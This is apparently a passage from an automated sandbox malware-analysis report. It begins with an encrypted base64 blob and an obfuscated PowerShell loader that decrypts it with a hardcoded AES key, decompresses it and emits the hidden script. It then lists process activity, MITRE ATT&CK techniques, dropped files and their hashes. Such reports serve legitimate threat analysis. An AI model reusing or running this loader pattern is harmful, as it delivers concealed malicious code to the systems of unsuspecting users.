vrDMnD2GqqdxsbENmcKY1hVL6wFJqCk58Dn6ndtBUhSWHjSKx7A4o2EIvSNsYCVI1UpQAIOz6EZyhXf7VwLs+NEmObCkOme6nrWe+r9/finwyaZOncpdr4dPE5Vi3XeyaougeawpIBrqnqfNjxOXLBPUc4tFTITmtwls1iiP0n0uVs1KdM/fVRz3Df4TSaVXbtpmUot0pIc543wCvGjoetdNFejQ1j+IdrecIwp5POX49VpeC6TepMqfLvc7QDlr6vr+DDMKzYIrB1rdMRaJzm7S9emxxPwaw2XSHnHzXtuR4qRNqf54ON1Af8cHJm0vEhPMruAU6/2uvcMC3w6Rv8R9eRLs8YAtacLh41xZ85EAr8OAcP7hau8h8ztDehJ1OFaN8bVvsYknoyL1vKIf505PN8TWd0t3htpsJVk9arKNP+WKbSlPZlbkSwytu73mjEW4bZDPHQYl9gyeg36BLO2JK3W+LpfIUoiTC14WUnpwitPVM3m4oNIj81iPwf8fUhoh+AEcnQNm7J17hPkdKKYoAu/+t6tUE8SVTsLzMCYvAoT3hZNU3F1B0OE4TfFUxyZ0lrwYWt/czXCKX1T7JBx9Ag2E0ujfo3q9vN1rD/q5GrLl8m9O7OFqBQF6XWfxvziABHx9ta20caHt1/AHtaV3DgygXLYpYbPnS/2XiPi6Go/ulQrvEBdW8fGZJcpUJJO7PN8DUccoZpDMO1+WubJhdtAkuLkJvGCBeUzP3E+mcV1F+u4fg08Vne1GJ8tiXuPoKwhNzcHfMo3DTMLuQ8SSOiMdNo6FzJnor2vHMo2oS35rzsFo8kIJDFW+IdkFGXs8p54uVGr5AIBJAz9DrfYFI2XHMxUCg90jcQO7c+1fRGVmK4md20s21J4ss4onJmDgqq9Qi3pcfxapdeDG6RYAj1mbaW04aC0oS93Cmb5nIRzr8i/RvZsvOfQGmqAWSrXQP8yGMAU1CXZuCPHwTQWajKK0UTs6d86mW5GBmsLvyyxxBvuNm7oS7fTuGOoYSbAy0Yp1xeVZqP36FEj+/nZ64i3vRQZ21lo+skTjLI6tt3q+1FSOLchqr9sSAVxJeL2RRJZekArAlRKeqOP3zIngXjiyY7EzM7k/4nWxkmnZb3lpdED75dqWr8pQLEIEUjpH3WOSY2geadmnC5hsSE2Ktncp4nz6c1Ck7pvqmYwVJdGqQ58Q+GFNyfRmfaIJRuajQ9wUTtWYkGatXdxO/+CIbitUgHNmcpFcwqPSo1NL8ndfTtbnQbk2qaBKmRql7CGyQ5T0JC2+GHgP6Q3ldjt6DOm40wZPLJ0791I/I/gVAhoGRXVhoeaisQg4i4+2wSyTtPRu6CGkaecjPjAaeLSlZum9x8FLM87iT/ZbezH+G/+CGJZjA0FRNg2s3czUuv+L7DDzLB15wYb5qJtnt3+Zxkek1kKAw/qmmx/0BkyJS+DqtI+3vjBWsZuTaYeSAPvs22rJ2mYJdltg8ahJr8u6uHN3I9QoZTT3X0GkftJsPTQQ+MKVrLWSEZtfdRd6Uykg6X5epg0EjLTBny5mpgHYrc8Ztk5Kspt+mmAnIaa3igJJP0/uaBeu9g/uQsBXGK54G2QKB1up7aKdfSQx2FhszgIq8d+6KtMluKmr2zV9V613oSiTZtxpoFma9zZ5u5rRg9ZTsnJmemb28hG6gTyCSamw5j4w6BVtDrTflaIt1BQ/tsqXFevStMlJpmBZ8A36NdJgB1VTJSz4Gmgbzn1zbPzinqAWNL6lUo9VeaDDlabx2S9GLrNVMh3esF0nby+UNXpFJe0jAViWuAjBbm1Hio/01TPzLOV6jLpCO+ECXLNRJ8j1s0Ya1i6807htU5QkkOqYy8aFHw4ZhrULSKF5NYsQ3l1iVI8nJRR3GPydxujNBXLci4yi78akgoLgHZcqdp8DvvAhWltpDiBwf7X5LvmSwFYNAi+j/HrNZMJz+EJVDlRJltFXq3c2nose8Qz7CKtO3up8ZMJZX3p9Ip91/Q3F8o/dWWxWCK7r0mxflAm9fvIxeusaZ1Vfmvr9PjEVZCNJgJ0NwLs36gMaA+i6ktk/+6bxl6zUoEtY6pL6ID/eGd9b1yU+0mvw15iPwcNXtKX2fjYNE0DrMkl6SGbsvODh2Z+LcdIuBsagNY/Tuy7QPXB';$ehhjfnL = 'TnJTRUlhcGVqa0NQdFRhS1pGWVNaU3podk1jenV5ZlE=';$RMJoUfk = New-Object 'System.Security.Cryptography.AesManaged';$RMJoUfk.Mode = [System.Security.Cryptography.CipherMode]::ECB;$RMJoUfk.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$RMJoUfk.BlockSize = 128;$RMJoUfk.KeySize = 256;$RMJoUfk.Key = [System.Convert]::FromBase64String($ehhjfnL);$EjEnM = [System.Convert]::FromBase64String($PIzPI);$unPSSWoW = $EjEnM[0..15];$RMJoUfk.IV = $unPSSWoW;$kTLbNnifg = $RMJoUfk.CreateDecryptor();$DJCVkyXhB = $kTLbNnifg.TransformFinalBlock($EjEnM, 16, $EjEnM.Length - 16);$RMJoUfk.Dispose();$ZAqg = New-Object System.IO.MemoryStream( , $DJCVkyXhB );$sTIxOXDa = New-Object System.IO.MemoryStream;$RBKQKjEUt = New-Object System.IO.Compression.GzipStream $ZAqg, ([IO.Compression.CompressionMode]::Decompress);$RBKQKjEUt.CopyTo( $sTIxOXDa );$RBKQKjEUt.Close();$ZAqg.Close();[byte[]] $XihdlK = $sTIxOXDa.ToArray();$cOJoskR = [System.Text.Encoding]::UTF8.GetString($XihdlK);$cOJoskR
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1132
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1928

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8S68XMBSTZGVG444YYXK.temp

Filesize
7KB

MD5
21ccacd10b92a27045a6ea4ba96e08db

SHA1
c3c19442ec0b9659e41472d054ecae9f7d089736

SHA256
e3c1a908d679cd1258529e7d039c27aa36f32837afaff81257d934bc7aaaf847

SHA512
a90ae02459a0991df86b1a465fb093a0d109991f45a07b3ddd271c7926c43064320851250b9ea54c7bb31d5c6157b5b112bb0f0123690a8d5dd1ec9404bc67fe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
21ccacd10b92a27045a6ea4ba96e08db

SHA1
c3c19442ec0b9659e41472d054ecae9f7d089736

SHA256
e3c1a908d679cd1258529e7d039c27aa36f32837afaff81257d934bc7aaaf847

SHA512
a90ae02459a0991df86b1a465fb093a0d109991f45a07b3ddd271c7926c43064320851250b9ea54c7bb31d5c6157b5b112bb0f0123690a8d5dd1ec9404bc67fe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
21ccacd10b92a27045a6ea4ba96e08db

SHA1
c3c19442ec0b9659e41472d054ecae9f7d089736

SHA256
e3c1a908d679cd1258529e7d039c27aa36f32837afaff81257d934bc7aaaf847

SHA512
a90ae02459a0991df86b1a465fb093a0d109991f45a07b3ddd271c7926c43064320851250b9ea54c7bb31d5c6157b5b112bb0f0123690a8d5dd1ec9404bc67fe

Download Submit
memory/1468-56-0x0000000002790000-0x00000000027D0000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing